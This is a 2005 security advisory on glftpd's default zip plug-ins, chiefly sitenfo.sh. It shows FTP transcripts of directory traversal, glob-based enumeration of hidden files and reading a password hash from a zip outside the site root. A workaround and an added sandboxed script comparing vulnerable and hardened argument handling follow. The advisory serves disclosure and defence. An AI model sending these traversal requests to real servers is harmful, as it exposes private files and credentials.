
glftpd.txt

25 Feb 2005 | Reported by Paul Craig | Type: packetstorm | Source: packetstormsecurity.com

Multiple vulnerabilities in Glftpd plug-ins allow file access and information disclosure.

Code
` Pimp industries.  
"Its all about the Bling, B^!%@s and Fame!"  
  
Multiple vulnerabilities in glftpd v1.26 - v2.00 default zip-based plug-ins:  
sitenfo.sh, sitezipchk.sh, siteziplist.sh  
  
(C) Paul Craig - Pimp Industries 2005  
  
  
Background  
-------------  
glftpd is an open source ftp server favoured by the more 'hardcore' ftp  
sites :) (www.glftpd.com)  
  
  
Exploit:  
-------------  
The vulnerabilities are not in glftpd itself but in a suite of zip-based  
plug-ins that ship with the glftpd package by default; these plug-ins are  
widely used in glftpd installations.  
This advisory focuses on the plug-in sitenfo.sh, a script that lets users  
read .nfo and .diz files from within zip archives ("SITE NFO" by default),  
although the same flaws apply to all of the .sh scripts listed above.  
  
Due to improper input validation, several flaws exist in the script that  
allow unprivileged access to files within the glftpd chroot and  
information disclosure of private files.  
  
First: directory traversal to confirm the existence of a file outside the  
ftp site root.  
  
ftp> site nfo ../etc/grouap  
200- dn's NFO Lister v1.00  
200-  
200- That zipfile (../etc/grouap) does not exist!  
200 Error executing command.  
ftp> site nfo ../etc/group  
200- dn's NFO Lister v1.00  
200-  
200- nfo(s) from ../etc/group:  
200-  
200 Command Successful.  
  
Here we learn that ../etc/group exists, a file outside the default FTP  
site root. Note the difference between the two responses: a non-existent  
name gets an error, an existing one gets "Command Successful", which is  
enough to probe for any path within the chroot.  
  
Second: directory traversal combined with shell globbing.  
Because the * in the argument is expanded by the shell rather than treated  
as a literal, a user can obtain the names of the first two files in any  
directory (they land in $1 and $2), including files within 'private' or  
hidden directories such as the 'staff' folder.  
  
ftp> site nfo ../../../../../etc/*  
200- dn's NFO Lister v1.00  
200-  
200- ../../../../../etc/group from ../../../../../etc/ftpd-dsa.pem:  
  
and to look inside private folders within the ftp root (which you are  
normally unable to see):  
  
ftp> site nfo staff/*  
200- dn's NFO Lister v1.00  
200-  
200- staff/Mark from staff/Peter:  
200- Command Successful.  
ftp> cd staff  
200- No such file or directory.  
  
Here we can see that staff/Mark and staff/Peter exist, even though we  
cannot see the staff/ directory itself by default, since we have no access  
to it.  
  
This can be extended to build a full directory tree by using guided  
wildcards within the globbed request, such as:  
site nfo ../../../../../etc/a*  
site nfo ../../../../../etc/b*  
site nfo ../../../../../etc/c*  
  
and so on, to enumerate every file and directory name.  
  
Finally, the script can also be used to view any file inside any zipfile  
within the glftpd chroot, such as backups or zipfiles in private  
directories.  
  
First, we find a zip file.  
  
ftp> site nfo ../../*.zip  
200- dn's NFO Lister v1.00  
200-  
200- nfo(s) from ../../backup.zip:  
  
backup.zip exists outside the glftpd site root and is passed as $1 to  
sitenfo.sh.  
  
Now we read every file within backup.zip whose name begins with 'p':  
ftp> site nfo ../../backup.zip p*  
200- dn's NFO Lister v1.00  
200-  
200- passwd from ../../backup.zip:  
200-  
glftpd:$c8aa2099$89be575337e36892c6d7f4181cad175d685162ad:0:0:0:/site:/bin/false  
  
This will of course only work for zip-compressed files, not gzip files.  
  
Combined, these flaws allow a user to browse the glftpd chrooted  
environment and then read any file inside any zip file. Since zip files  
may contain sensitive information such as backups or private documents,  
this could easily lead to further privilege escalation.  
  
sitezipchk.sh and siteziplist.sh both contain similar flaws, although I  
have noticed that sitenfo.sh is the one most frequently enabled on glftpd  
sites.  
  
Suggestions/Work Around:  
-------------  
  
The easy solution is to remove sitenfo.sh, siteziplist.sh and  
sitezipchk.sh from the /bin directory; passing user-supplied arguments to  
the shell is never wise and is not worth the security risk.  
  
  
Company status  
---------------  
Pimp Industries is a privately owned New Zealand based security research  
company.  
If you would like to contact Pimp Industries to discuss any nature of  
business, please email us at headpimp at pimp-industries.com.  
  
  
Personal Pimp Hello's fly to:  
-------------------  
The boys at security-assessment.com, pinky, sozni, and you! yes, you!  
  
Paul Craig  
Head Pimp, Security Researcher  
Pimp Industries  
"Move fast, think faster"  
  
  
`
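As an added illustration of the argument-handling flaw behind the three findings above and of the "validate before you hand it to the shell" alternative to simply deleting the scripts, the sandboxed snippet below is not the page's code and not the real sitenfo.sh (whose source the advisory does not reproduce). It mimics the described behaviour with a hypothetical vuln_nfo (the argument is word-split and glob-expanded, and '..' is accepted) next to a hypothetical safe_nfo that refuses traversal, glob and shell metacharacters and requires a .zip beneath the site root. The sandbox directory layout, the file names (group, ftpd-dsa.pem, staff/Mark, staff/Peter, backup.zip, incoming/release.zip) and the response strings are constructed to echo the advisory's transcripts; unzip is never invoked, so it runs offline.

```shell
#!/bin/sh
# Added illustration, not the real sitenfo.sh: the argument-handling flaw the
# advisory describes (unquoted, unvalidated user input expanded by the shell)
# next to a hardened version that rejects traversal and glob characters.
# All names here are hypothetical; unzip is not called so this runs anywhere.

# Constructed sandbox standing in for the glftpd chroot: "site" is the ftp
# root the user may browse, "etc" and "backup.zip" sit outside it, and
# "site/staff" is a directory the user has no permission to list.
SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
SITEROOT="$SANDBOX/site"
mkdir -p "$SITEROOT/incoming" "$SITEROOT/staff" "$SANDBOX/etc"
: > "$SANDBOX/etc/group"
: > "$SANDBOX/etc/ftpd-dsa.pem"
: > "$SANDBOX/backup.zip"
: > "$SITEROOT/staff/Mark"
: > "$SITEROOT/staff/Peter"
: > "$SITEROOT/incoming/release.zip"

# Vulnerable pattern: the argument is re-split and glob-expanded by the
# shell, and nothing stops '..' from walking out of the site root. A real
# plug-in would go on to run unzip against "$1"; here we only report what
# the shell resolved, which is already the information leak.
vuln_nfo() {
    (
        cd "$SITEROOT" || exit 1
        # shellcheck disable=SC2086
        set -- $1            # unquoted: 'staff/*' becomes 'staff/Mark staff/Peter'
        if [ -e "$1" ]; then
            printf 'nfo(s) from %s%s\n' "$1" "${2:+ and $2}"
        else
            printf 'That zipfile (%s) does not exist!\n' "$1"
        fi
    )
}

# Hardened pattern: accept only a relative path made of safe characters that
# names a .zip beneath the site root, and never let the shell expand it.
# Symlinks inside the site root are not resolved here; a real fix should
# also canonicalise the path (readlink -f where available) before use.
safe_nfo() {
    arg=$1
    case $arg in
        ''|/*|*..*)
            printf 'Invalid path\n'; return 1 ;;
    esac
    # Anything outside A-Z a-z 0-9 . _ / - (globs, spaces, shell metacharacters) is refused.
    if [ -n "$(printf '%s' "$arg" | tr -d 'A-Za-z0-9._/-')" ]; then
        printf 'Invalid path\n'; return 1
    fi
    case $arg in
        *.zip) ;;
        *) printf 'Not a zipfile\n'; return 1 ;;
    esac
    target="$SITEROOT/$arg"
    if [ -f "$target" ]; then
        printf 'nfo(s) from %s\n' "$arg"
    else
        printf 'That zipfile (%s) does not exist!\n' "$arg"
    fi
}

# Replay the advisory's requests against both handlers.
for req in '../etc/grouap' '../etc/group' 'staff/*' '../*.zip' 'incoming/release.zip'; do
    printf 'vuln %-22s -> ' "$req"; vuln_nfo "$req"
    printf 'safe %-22s -> ' "$req"; safe_nfo "$req" || true
done
```

The vulnerable handler reproduces all three findings from one root cause: an existence oracle (different message for a missing versus present path), glob expansion leaking the first two names of any directory, and acceptance of '..' so the probe reaches outside the site root. The hardened handler fails closed on the same inputs while still serving a legitimate relative path to a zip.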
